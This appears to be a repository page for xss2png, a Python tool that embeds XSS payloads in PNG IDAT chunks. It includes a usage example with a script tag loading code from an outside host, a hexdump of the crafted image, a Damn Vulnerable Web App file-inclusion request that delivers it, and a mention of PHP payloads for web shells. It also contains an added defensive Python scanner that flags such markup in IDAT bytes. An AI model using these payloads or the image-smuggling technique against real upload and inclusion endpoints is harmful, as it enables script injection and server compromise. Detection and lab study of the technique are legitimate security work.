  • Language
    Python
  • License
    MIT License
  • Created over 5 years ago
  • Updated about 2 years ago


PNG IDAT chunks XSS payload generator

xss2png

A simple tool to generate PNG images with XSS payloads stored in PNG IDAT chunks.

Huge thanks to Nathaniel McHugh for sharing his PHP source code with me.

Usage

~/$ python3 xss2png.py -p "<SCRIPT SRC=//XSS.VAVKAMIL.CZ></SCRIPT>" -o xss.png
               ____                    
 __  _____ ___|___ \ _ __  _ __   __ _ 
 \ \/ / __/ __| __) | '_ \| '_ \ / _` |
  >  <\__ \__ \/ __/| |_) | | | | (_| |
 /_/\_\___/___/_____| .__/|_| |_|\__, |
                    |_|          |___/
 PNG IDAT chunks XSS payload generator

[i] Using payload: <SCRIPT SRC=//XSS.VAVKAMIL.CZ></SCRIPT>

[i] Generating final PNG output
[!] PNG output saved as: xss.png

Example

~/$ hexdump -C xss.png 
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 79 49 44 41  54 78 9c 63 fc 3c 53 43  |....yIDATx.c.<SC|
00000030  52 49 50 54 20 53 52 43  3d 2f 2f 58 53 53 2e 56  |RIPT SRC=//XSS.V|
00000040  41 56 4b 41 4d 49 4c 2e  43 5a 3e 3c 2f 53 43 52  |AVKAMIL.CZ></SCR|
00000050  49 50 54 3e 20 a0 ff ba  e3 fc ab 7f cf dc 0c 7b  |IPT> ..........{|
00000060  c5 f2 d2 cb 43 f1 c1 fd  db 2a cf df de ff fc ff  |....C....*......|
00000070  f9 87 1f 56 7f ff f2 04  7a 5c bf 72 f7 ca b3 37  |...V....z\.r...7|
00000080  9a 7a 6b 3b fb 18 19 19  46 c1 28 18 05 a3 60 14  |.zk;....F.(...`.|
00000090  8c 82 51 30 0a 46 c1 28  18 05 43 0e 00 00 1b 22  |..Q0.F.(..C...."|
000000a0  26 02 5b 4d 02 76 00 00  00 00 49 45 4e 44 ae 42  |&.[M.v....IEND.B|
000000b0  60 82                                             |`.|
000000b2
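
For triage of uploaded images, a check can walk the PNG chunk structure and look for markup openers in the raw, still-compressed IDAT bytes, which is where the hexdump above shows the payload sitting. This is an added example, not part of xss2png; the marker list, the function names and the two constructed samples are assumptions.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Assumed marker list: markup/code openers with no reason to appear in a deflate stream.
MARKERS = (b"<script", b"<?php", b"<?=", b"<svg", b"<img", b"<iframe")

def iter_chunks(png: bytes):
    """Yield (type, data, crc_ok) per chunk; raise ValueError on malformed input."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos < len(png):
        if pos + 8 > len(png):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 8 + length + 4
        if end > len(png):
            raise ValueError("chunk length exceeds file size")
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[end - 4:end])
        yield ctype, data, crc == zlib.crc32(ctype + data)
        pos = end
        if ctype == b"IEND":
            break

def scan_idat(png: bytes):
    """Return sorted markers found in the concatenated raw IDAT bytes (case-insensitive)."""
    idat = b"".join(d for t, d, _ in iter_chunks(png) if t == b"IDAT").lower()
    return sorted(m.decode() for m in MARKERS if m in idat)

def make_png(idat: bytes) -> bytes:
    """Constructed helper: wrap bytes in a minimal 32x32 RGB PNG container."""
    def chunk(t, d):
        return struct.pack(">I", len(d)) + t + d + struct.pack(">I", zlib.crc32(t + d))
    ihdr = struct.pack(">IIBBBBB", 32, 32, 8, 2, 0, 0, 0)
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")

# Constructed samples: a blank image, and the opening IDAT bytes from the hexdump above.
CLEAN = make_png(zlib.compress(b"\x00" * (32 * (1 + 32 * 3))))
FLAGGED = make_png(bytes.fromhex("789c63fc") + b"<SCRIPT SRC=//XSS.VAVKAMIL.CZ></SCRIPT>")

if __name__ == "__main__":
    for name, png in (("clean", CLEAN), ("flagged", FLAGGED)):
        print(name, scan_idat(png))
```

Short markers such as `<?=` can occur by chance in large images, so a hit is a signal for review rather than proof of a payload.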

Damn Vulnerable Web App

http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/xss.png

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2019 00:13:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3422
Connection: close

�PNG
�

IHDR  ������yIDATx�c�<SCRIPT SRC=\\XSS.VAVKAMIL.CZ></SCRIPT> ������=s3���K��_s������?��_�X1��	��~���go4��v�322��Q0
F�(���`���Q0
��4�%���۠IEND�B`�
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

It can also be useful, for example, with a PHP payload in the HackerOne CTF TempImage challenge.

Credits

fin1te
Adam Logue
huntergregal
IDontPlayDarts
Masato Kinugawa
Nathaniel McHugh

Relevant posts

06-2012 Encoding Web Shells in PNG IDAT chunks

11-2015 Bug-hunter's Sorrow

01-2016 An XSS on Facebook via PNGs & Wonky Content Types

03-2016 Revisiting XSS payloads in PNG IDAT chunks

10-2022 Persistent PHP payloads in PNGs: How to inject PHP code in an image – and keep it there !

Other tools

PNG-IDAT-chunks

PNG-IDAT-Payload-Generator

pixload

Stack Overflow

PHP shell on PNG's IDAT Chunk
